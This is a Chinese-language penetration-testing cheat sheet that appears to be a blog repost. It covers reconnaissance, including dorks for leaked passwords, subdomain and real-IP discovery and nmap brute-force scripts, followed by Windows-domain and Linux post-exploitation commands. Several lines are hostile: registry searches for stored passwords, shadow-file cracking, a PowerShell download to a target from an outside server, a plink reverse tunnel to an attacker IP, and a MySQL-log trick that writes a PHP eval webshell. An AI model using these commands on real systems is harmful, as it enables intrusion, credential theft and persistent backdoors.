当你的才华
还撑不起你的野心时
那你就应该静下心来学习
提前,祝贺大家七夕单身快乐... .../流下了伤心欲绝的眼泪
整理这些散落在不同地方的经典文章与公众号的信息收集方法与内网常用命令,花费了个人比较多的精力,愿分享出来,与君共享,本文章涉及与未涉及的知识点,会长期进行维护...
目录
0x01 前期信息收集踩点
0x02 GitHub 信息收集
0x03 端口、邮箱、备案收集
0x04 Whois 查询
0x05 在线网站备案查询
0x06 查找真实IP
假设:如果目标网站使用了CDN,该如何找到真实IP?
0x07 指纹识别
0x08 非常规操作
0x09 SSL/TLS证书查询
0x10 OSINT调查平台工具
0x11 自动化批量漏扫工具刺探+手工挖掘
内网信息探测命令
0x01 基本信息
0x02 常用端口
0x03 域内信息收集
0x04 杀毒软件进程名字
0x05 获取系统安装的软件的信息
0x06 查看启动程序信息
0x07 获取系统注册的服务信息
0x08 收集本地用户和组信息
0x09 敏感信息查找
0x10 获取本地开放的端口与连接信息
0x11 防护墙配置
0x12 查询远程连接服务
0x13 工作组信息收集
0x14 其它
0x15 域凭据收集
Linux 信息收集
0x01 版本信息
0x02 用户和组
0x03 环境信息
0x04 进程信息
0x05 服务信息
0x06 计划任务
0x07 网络、路由和通信
0x08 已安装的程序
0x09 文件
0x10 公私钥信息
0x11 日志
0x12 常见配置文件
0x01 前期信息收集踩点
Googe Hacke 搜索
如需更多搜索引擎语法前往
https://blog.csdn.net/God_XiangYu/article/details/103145225
https://blog.csdn.net/God_XiangYu/article/details/100062233
https://securitytrails.com/blog/google-hacking-techniques
以下是利用GHDB结合搜索引擎高级指令进行敏感信息获取的对应表:
| a b c | 自动对词进行拆分匹配 拆分标准 空格 |
| "a b c " | 把a b c 当成一个整体去查 |
| " a*b" | *通配符 里面是一个或者多个 以a开头 b结尾 |
| "ab" -c | 找到ab 不包含c |
| a and b | 包含a和b |
| "ab"(c|d) | ab中可能包含c或者d |
| intitle: xx | 找标题 |
| intext: xx | 找内容 |
| inurl: *.baidu.com | 模糊搜索地址 |
| inurl:phpmyadmin/index.php & (intext:username & password & "Welcome to") | |
| inanchor:修改密码 | 锚点描述文本 |
| filetype:pdf | 搜索 |
| cache:baidu.com | 快照 历史信息 |
| link:xxx.com | 搜索所有链接有xxx.com 链接 |
| site:*.baidu.com | 搜索这个所有域名 |
| related: xx.com |
搜索相关网站 |
0x02 GitHub 信息收集
- 数据库信息泄露
site:github.com root password site:github.com sa password site:github.com User ID='sa';Password
- svn信息泄露
site:github.com svn site:github.com svn password site:github.com svn username site:github.com svn username password
- 数据库备份文件
site:github.com inurl:sql
- 综合信息泄露
site:github.com password site:github.com ftp ftppassword site:github.com 密码 site:github.com 内部
- Github 信息收集
https://github.com/michenriksen/gitrob https://securitytrails.com/blog/github-dorks
0x03 端口、邮箱、备案收集
| 名称 | 地址或命令 |
| Tag1-Nmap端口扫描 | nmap -sS -T4 -Pn --open -n -p- -iL ***.txt -oX *** |
| 小蓝本 | https://www.xiaolanben.com/ |
| ThreatScan | https://scan.top15.cn/web/ |
| 邮箱收集 | https://www.email-format.com/ |
| 奇怪域名收集 | https://archive.org/web/ |
| Aquatone ---子域名截图 | https://github.com/michenriksen/aquatone |
| Github 收集 | "*.com" login "*.com" ftp "*.com" password "*.com" token |
| 图标hash搜索 | 1. 平台 3. 脉脉 5. 抓公众号、小程序链接,能发现一堆奇奇怪怪的资产;还有抖音,支付宝商号等等 |
| Fuzz | 资产存活,但却访问不了,是因为目录不正确,收集一个高命中率的资产字典进行fuzz |
| Hosts碰撞 | https://github.com/r35tart/Hosts_scan 用于碰撞某些绑定了host的域名进行强制匹配进行访问,跟改了本地host文件一样 |
| JS分析 | 网页的JS中往往存在着奇奇怪怪的URL,里面有些参数说不定也有,意想不到的接口泄露 推荐工具JSfinder https://github.com/Threezh1/JSFinder |
| 客服窗口 |
为什么此处会说客户窗口?说不定能弹个XSS,在打点的时候可以用此处知道客户的后台地址和Cookie |
0x04 Whois 查询
通过whois来对域名信息进行查询,可以查到注册商、注册人、邮箱、DNS解析服务器、注册人联系电话等,因为有些网站信息查得到,有些网站信息查不到,所以推荐以下信息比较全的查询网站,直接输入目标站点即可查询到相关信息。
| 名称 | 地址 |
| 站长之家域名WHOIS信息查询地址 | http://whois.chinaz.com/ |
| 爱站网域名WHOIS信息查询地址 | https://whois.aizhan.com/ |
| 腾讯云域名WHOIS信息查询地址 | https://whois.cloud.tencent.com/ |
| 美橙互联域名WHOIS信息查询地址 | https://whois.cndns.com/ |
| 爱名网域名WHOIS信息查询地址 | https://www.22.cn/domain/ |
| 易名网域名WHOIS信息查询地址 | https://whois.ename.net/ |
| 中国万网域名WHOIS信息查询地址 | https://whois.aliyun.com/ |
| 西部数码域名WHOIS信息查询地址 | https://whois.west.cn/ |
| 新网域名WHOIS信息查询地址 | http://whois.xinnet.com/domain/whois/index.jsp |
| 纳网域名WHOIS信息查询地址 | http://whois.nawang.cn/ |
| 中资源域名WHOIS信息查询地址 | https://www.zzy.cn/domain/whois.html |
| 三五互联域名WHOIS信息查询地址 | https://cp.35.com/chinese/whois.php |
| 新网互联域名WHOIS信息查询地址 | http://www.dns.com.cn/show/domain/whois/index.do |
| 国外WHOIS信息查询地址 | https://who.is/ |
0x05 在线网站备案查询
| 名称 | 地址 |
| 小蓝本 | https://www.xiaolanben.com/ |
| 天眼查 | https://www.tianyancha.com/ |
| ICP备案查询网 | http://www.beianbeian.com/ |
| 爱站备案查询 | https://icp.aizhan.com |
| 域名助手备案信息查询 | http://cha.fute.com/index |
| 企查查 | https://www.qcc.com/ |
0x06 查找真实IP
多地ping、nslookup、DNS 历史查询、查找子域名、反向连接、利用SSL证书寻找真实IP、国外解析域名、漏洞利用、目标敏感文件泄露、扫描全网、从 CDN 入手、利用HTTP标头寻找真实原始IP、利用网站返回的内容寻找真实原始IP、F5 LTM解码法
DNS解析与Whois 查询意义何在?
(1)DNS解析记录可以反查IP,比较早的解析记录有时可以查到真实IP,需要留意一下。
(2)注册人电话,注册人邮箱等社工信息可以钓鱼或者收集进字典来爆破目标办公系统。
为何需要手机子域名?
收集子域名可以扩大测试范围,同一域名下的二级域名都属于目标范围。
- 常用方式
子域名中的常见资产类型一般包括办公系统,邮箱系统,论坛,商城等,其他管理系统,网站管理后台等较少出现在子域名中。
首先找到目标站点,在官网中可能会找到相关资产(多为办公系统,邮箱系统等),关注一下页面底部,也许有管理后台等收获。
查找目标域名信息的方法:
| 名称 | 用法或地址 |
| FOFA | title="公司名称" |
| 钟馗之眼 | site=域名即可 |
| 百度 | intitle=公司名称 |
| intitle=公司名称 | |
| FOFA搜索子域名 | https://fofa.so/ 语法:domain=”baidu.com” |
| Hackertarget查询子域名 | https://hackertarget.com/find-dns-host-records/ 注意:查询子域名可以得到一个目标大概的ip段,接下来可以通过ip来收集信息。 |
| 站长之家,直接搜索名称或者网站域名 | http://tool.chinaz.com/ |
| 钟馗之眼,直接搜索名称或网站名称 | https://www.zoomeye.org/ |
第三方子域名查询
| 名称 | 地址 |
| 子域名在线查询 | https://phpinfo.me/domain/ |
| 子域名在线查询 | https://www.t1h2ua.cn/tools/ |
| IP138查询子域名 | https://site.ip138.com/baidu.com/domain.htm |
| Layer子域名挖掘机4.2 | https://www.webshell.cc/6384.html |
| Layer子域名挖掘机5.0 | https://pan.baidu.com/s/1wEP_Ysg4qsFbm_k1aoncpg 提取码:uk1j |
| SubDomainBrute | https://github.com/lijiejie/subDomainsBrute |
| Sublist3r | https://github.com/aboul3la/Sublist3r |
端口检测
| 名称 | 地址 |
| 在线端口检测 | http://coolaf.com/tool/port |
| 扫描主机端口 | nmap -T5 -A -v -p- <target ip> |
| 扫描一个IP段,探测存活主机 | nmap -sP <network address> </CIDR> |
| 探测操作系统类型 | nmap -0 <target IP> |
| 寻找登录授权页面 | nmap -p 80 --script http-auth-finder <www.xxx.com> |
| SSH爆破 | nmap -p22 --script ssh-brute <target ip> |
| dns 域传送漏洞 | nmap -p 53 --script dns-zone-transfer.nse -v <target ip> |
| Masscan | Masscan 127.0.0.0/24 -p443 # 单端口扫描 |
| Masscan | Masscan 127.0.0.0/24 --top-ports 100 -rate 100000 # 快速扫描 |
| Masscan | Masscan 127.0.0.0/24 --top-ports 100 --excludefile exclude.txt # 排除指定目标 |
| Masscan | Masscan 127.0.0.0/24 -p20,21,22,23,80,161,443,873,2181,3389,6379,7001,8000,8009,8080,9000,9009,9090,9200,9300,10000,50070 > results.txt |
假设:如果目标网站使用了CDN,该如何找到真实IP?
注意:很多时候,主站虽然是用了CDN,但子域名可能没有使用CDN,如果主站和子域名在一个ip段中,那么找到子域名的真实IP也是一种途径,而且说不定子域名IP的C段就存在主域名的真实IP。
1. 部分收集真实IP,请参考如下文章
https://blog.csdn.net/God_XiangYu/article/details/106359936
2. phpinfo、旁站和C段
如果目标网站存在phpinfo泄露等,可以在phpinfo中的SERVER_ADDR或_SERVER[“SERVER_ADDR”]找到真实IP。
旁站往往存在业务功能站点,建议先收集已有IP的旁站,再探测C段,确认C段目标后,再在C段的基础上再收集一次旁站。
旁站是和已知目标站点在同一服务器但不同端口的站点,通过以下方法搜索到旁站后,先访问一下确定是不是自己需要的站点信息。
PS:不是所有C段都是该目标服务器的,可能只是某个范围是或切割多个范围才属于该目标范围的IP段,建议先收集已有IP的旁站,再探测C段,当然有些C段,你别傻不拉几的用Goby或漏扫直接扫,有些有WAF,你线程一大就封你IP,扫或不扫,根据现场测试业务环境决定。
3. 网络空间搜索引擎
如FOFA搜索旁站和C段
Nmap,Msscan扫描等
例如:
nmap -p 80,443,8000,8080 -Pn 192.168.0.0/24
网络空间搜索引擎
如果想要在短时间内快速收集资产,那么利用网络空间搜索引擎是不错的选择,可以直观地看到旁站,端口,站点标题,IP等信息,点击列举出站点可以直接访问,以此来判断是否为自己需要的站点信息。FOFA的常用语法
1、同IP旁站:ip=”192.168.0.1”
2、C段:ip=”192.168.0.0/24”
3、子域名:domain=”baidu.com”
4、标题/关键字:title=”百度”
5、如果需要将结果缩小到某个城市的范围,那么可以拼接语句
title="百度"&& region="Beijing"
6、特征:body=”百度”或header=”baidu”
扫描敏感目录/文件
扫描敏感目录需要强大的字典,需要平时积累,拥有强大的字典能够更高效地找出网站的管理后台,敏感文件常见的如.git文件泄露,.svn文件泄露,phpinfo泄露等,这一步一半交给各类扫描器就可以了,将目标站点输入到域名中,选择对应字典类型,就可以开始扫描了,十分方便
1、御剑
https://www.fujieace.com/hacker/tools/yujian.html
2、7kbstorm
https://github.com/7kbstorm/7kbscan-WebPathBrute
3、bbscan
https://github.com/lijiejie/BBScan
4、dirmap
https://github.com/H4ckForJob/dirmap
5、dirsearch
https://github.com/maurosoria/dirsearch
6、Github搜索
0x07 指纹识别
收集网站信息,对网站进行指纹识别,通过识别指纹,确定目标的cms及版本
| 云悉 | http://www.yunsee.cn/info.html |
| 潮汐指纹 | http://finger.tidesec.net/ |
| CMS指纹识别 | http://whatweb.bugscaner.com/look/ |
0x08 非常规操作
1. 如果找到了目标的一处资产,但是对目标其他资产的收集无处下手时,可以查看一下该站点的body里是否有目标的特征,然后利用网络空间搜索引擎(如fofa等)对该特征进行搜索,如:body=”阿里XX”或body=”aliyun”等。
该方式一般适用于特征明显,资产数量较多的目标,并且很多时候效果不错2. 通过上述方式的找到aliyun.com的特征后,再进行body的搜索,然后再搜索到aliyun.com的时候,此时fofa上显示的IP大概率为aliyun.com的真实IP。
3. 如果需要对政府网站作为目标,那么在批量获取网站首页的时候,可以用上如下地址来查询
全国政府网站基本信息数据库
0x09 SSL/TLS证书查询
SSL/TLS证书通常包含域名、子域名和邮件地址等信息,结合证书中的信息,可以更快速地定位到目标资产,获取到更多目标资产的相关信息。
| 名称 | 地址 |
| 亚洲诚信-SSL/TLS安全评估 | https://myssl.com/ |
| AUTO-EARN |
https://github.com/Echocipher/AUTO-EARN |
0x10 OSINT调查平台工具
| 名称 | 地址 |
| iKy | https://kennbroorg.gitlab.io/ikyweb/ PS:电子邮件收集信息并以漂亮的可视界面显示结果的工具 |
| Boardreader | https://boardreader.com/ PS:搜索全球各个论坛平台的内容。 |
| blackhat线上会议 | https://www.blackhat.com/us-20/briefings/schedule/ |
| CTFR | https://github.com/UnaPibaGeek/ctfr 滥用证书透明度日志,允许在几秒钟内获取子域。 |
| DNS 聚合器 | https://dnsdumpster.com/ |
0x11 自动化批量漏扫工具刺探+手工挖掘
网上有很多【Github】工具,此处就不介绍了,例如Goby+xray、AWVS等等
分割线
内网信息探测命令
0x01 基本信息
- 获取主机名
hostname echo %COMPUTERNAME%
- 系统体系架构
echo %PROCESSOR_ARCHITECTURE%
- 获取所属域信息
systeminfo systeminfo /S 192.168.1.101 /U testlab\test /P "test" 查看远程机器的系统配置
- 查看补丁信息
systeminfo/wmic qfe get caption,description,hotfixid,installedon
- 获取环境变量
set
- 获取IP地址(查看网络配置)
ipconfig /all
- 查看安装软件的版本
wmic product >secbang.txt # 使用wmic命令,把结果输出到txtGet-UnattendedInstallFile powershell "Get-WmiObject -class Win32_Product |Select-Object -Property name,version"
- 获取当前用户名
whoami 或 echo %USERNAME% whoami /all # 查看当前用户权限
- 查看注册表中的密码
reg query HKCU /f password /t REG_SZ /s reg query HKLM /f password /t REG_SZ /s
- 查看路由器信息
route print
- 查看本地DNS缓存
ipconfig /displaydns
- 跟踪本机出口ip
tracert 8.8.8.8
- 查看ARP 缓存(查找有价值的内网arp通信记录)
arp -a
- 查看是否连接到其它主机
netstat -ano
- 查看hosts文件
C:\WINDOWS\System32\drivers\etc\hosts
- 查看接口配置
netsh dump
- 查看SNMP配置
reg query HKLM\SYSTEM\CurrentControlSet'Services\SNMP /s
- 查看代理
reg query "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings
- 查看本机共享列表
net share,wmic share get name,path,status
0x02 常用端口
| 端口号 | 端口说明 | 利用技巧 |
|---|---|---|
| 21/22/69 | FTP/TFTP:文件传输协议 | 爆破、嗅探、文件传输 |
| 22 | SSH:远程连接 | 爆破、SSH隧道内网转发、文件传输 |
| 23 | Telnet:远程连接 | 爆破、嗅探 |
| 25 | SMTP:邮件服务 | 邮件伪造 |
| 53 | DNS:域名系统 | DNS区域传输\DNS劫持\DNS缓存投毒\DNS欺骗\利用DNS隧道技术刺透防火墙 |
| 67/68 | DHCP | 劫持、欺骗 |
| 110 | pop3 | 爆破 |
| 139 | Samba | 爆破、未授权访问、远程代码执行 |
| 143 | IMAP | 爆破 |
| 161 | SNMP | 爆破 |
| 389 | LDAP | 注入攻击、未授权访问 |
| 512/513/514 | linux rexec服务 | 爆破、远程登录 |
| 873 | rsync服务 | 未授权访问 |
| 1352 | Lotus Domino邮件服务 | 爆破:弱口令、信息泄漏:源代码 |
| 1433 | MSSQL | 注入、SA弱口令爆破、提权 |
| 1521 | Oracle | 注入、TNS爆破 |
| 2049 | NFS | 配置不当 |
| 2181 | ZooKeeper服务 | 未授权访问 |
| 3306 | MySQL | 注入、提权、爆破 |
| 3389 | RDP | 爆破、Shift后门、0708 |
| 4848 | GlassFish控制台 | 爆破:控制台弱口令、认证绕过 |
| 5000 | Sybase/DB2数据库 | 爆破、注入 |
| 5432 | PostgreSQL | 缓冲区溢出、注入、爆破:弱口令 |
| 5632 | PcAnywhere服务 | 抓密码、代码执行 |
| 5900 | VNC | 爆破:弱口令、认证绕过 |
| 6379 | Redis | 未授权访问、爆破:弱口令 |
| 7001、7002 | WebLogic控制台 | Java反序列化、控制台弱口令+部署webshell |
| 80/443 | Web | 常见web攻击、对应服务器版本漏洞 |
| 8080/8089 | JBoss/Resin/Jetty/Jenkins | 反序列化、控制台弱口令 |
| 8069 | Zabbix | 远程命令执行 |
| 9090 | WebSphere控制台 | 爆破:控制台弱口令、Java反序列 |
| 9200/9300 | Elasticsearch服务 | 远程代码执行 |
| 11211 | Memcacache | 未授权访问 |
| 27017、27018 | MongoDB | 爆破、未授权访问 |
0x03 域内信息收集
- 通过查询系统详细信息来判断是否存在域
systeminfo|findstr "Domain" systeminfo|findstr "域"
- 查看指定用户在当前域中的详细属性信息
net user Agan /domain
- 查看当前域中的所有用户名,根据用户名总数大概判断域的规模
net user /domain
- 查看时间服务器,一般域控会做时间服务器
net time /domain
- 查看域或工作组中的计算机列表(查看所有的域名称)
net view /domain
- 查看指定域中在线的计算机列表
net view /domain:domain_name
- 获取域分组
net group /domain
- 查看当前域中的域管账户
net group "domain admins" /domain
- 查看当前域中的所有的计算机名(登录过该域的计算机)
net group "domain computers" /domain
- 查看域控
net group "domain controllers" /domain
- 查看域控机器名
nltest /DCLIST:域名
- 查看域控主机名
nslookup -type=SRV \_ladp._tcp
- 查看域控制器IP
dsquery server
- 查看域控制器组
net group "Domain Controllers" /domain,netdom query pdc
- 查看域内信任关系
nltest /domain_trusts
- 查看当前域的域内账户密码设置策略
net accounts /domain
- 查看看当前的登录域
net config workstation
- 查看当前域中在线的机器,不太直观,批处理把机器名对应的ip也显示出来
net view ---- WIN10下使用Net view会出现如下报错 System error 1231 System error 6118 解决:https://social.technet.microsoft.com/Forums/en-US/6f102ed1-8e76-4cb7-8dec-05714466d441/net-view-system-error-1231?forum=win10itpronetworking ----
- ※【DC执行】导出域内DNS信息
dnscmd /zoneexport hack7.local dns.txt
- 查看域内邮件服务器
nslookup -q=mx agan1.local
- 查看域内DNS服务器
nslookup -q=ns agan1.local
- 查看域内的主域控,仅限win2008及之后的系统
netdom query pdc
- dsquery导出域信息
利用dsquery 工具搜集域内信息,域成员机器需要自己传上去 dsquery computer # 查看当前域内的所有机器,dsquery工具一般在域控上才有,不过你可以上传一个dsquery dsquery user # 查看当前域中的所有账户名 dsquery group # 查看当前域内的所有组名 dsquery subnet # 查看到当前域所在的网段,结合nbtscan使用 dsquery site # 查看域内所有的web站点 dsquery server # 查看当前域中的服务器(一般结果只有域控的主机名) dsquery user domainroot -name admin* -limit 240 # 查询前240个以admin开头的用户名
- csvde导出域信息
拥有一个当前有效的域用户账户及密码时,使用如下命令 csvde.exe –f c:\windows\temp\e.csv –n –s 192.168.1.100(DC的IP) –b 域用户名 域名 域用户密码 如果拥有使用域成员主机的system权限或者当前就在DC上 csvde.exe –f c:\windows\temp\e.csv –n –s 192.168.1.100(DC的IP)
- SPN扫描
setspn -T target.com -Q ** # win自带命令完成扫描 或 setspn -Q *
- 数据库配置文件、历史记录等
cat /var/apache2/config.inc cat /var/lib/mysql/mysql/user.MYD cat /root/anaconda-ks.cfg cat ~/.bash_history cat ~/.nano_history cat ~/.atftp_history cat ~/.mysql_history cat ~/.php_history
- 下载shadow 爆破密码
mkdir /root/.john cd /root/.john unshadow passwd.txt shadow.txt > hash.txt
PS:
- 在提权过程中,你需要将文件放到你的目标上
Powershell Cmdlet(Powershell 3.0及更高版本):
Invoke-WebRequest "https://myserver/filename" -OutFile "C:\Windows\Temp\filename"
Powershell One-Liner:
(New-Object System.Net.WebClient).DownloadFile("https://myserver/filename","C:\Windows\Temp\filename")
- 开放SMB 端口转发
plink.exe -l root -pw password -R 445:127.0.0.1:445 YOURIPADDRESS
- 慢日志写SHell
set global general_log='on'
set global general_log_file='D:\\phpStudy4IIS\\WWW\\slow_log.php' #一定要使用 '\\'
select "<?php eval($_POST[angel])?>"
参考链接:
https://mp.weixin.qq.com/s/0-UpfCvUVzXZkTAEHHrdhQ
https://github.com/ZTHacker/Penetration_orders
https://mp.weixin.qq.com/s/LnjKK1YJ7BvMXPuFbeq37w
https://mp.weixin.qq.com/s/DNJPQdHzBSYx0s3YcPFOiQ
https://mp.weixin.qq.com/s/zQmd2QeiK4Ggkx6rLH724A
https://mp.weixin.qq.com/s/9ZwsdxGXscUv59oFpDhfIQ
https://mp.weixin.qq.com/s/7_XGgcUnGE8N73qP-tKjtg
https://mp.weixin.qq.com/s/I8sfpRvtQWP7GiqSILwcaw
https://mp.weixin.qq.com/s/pK4j81VuUh4WuOiJ26uJHQ
https://mp.weixin.qq.com/s/D6QLlN5ew8IbUp32TznUAQ
https://mp.weixin.qq.com/s/eX6RmlcinT8nKXkEgbdTlA
https://mp.weixin.qq.com/s/f0dyixyPpGujWuWWwbLDqQ
https://mp.weixin.qq.com/s/30xOtFsstX4wemiRKoMMwQ
虽然我们生活在阴沟里,但依然有人仰望星空!
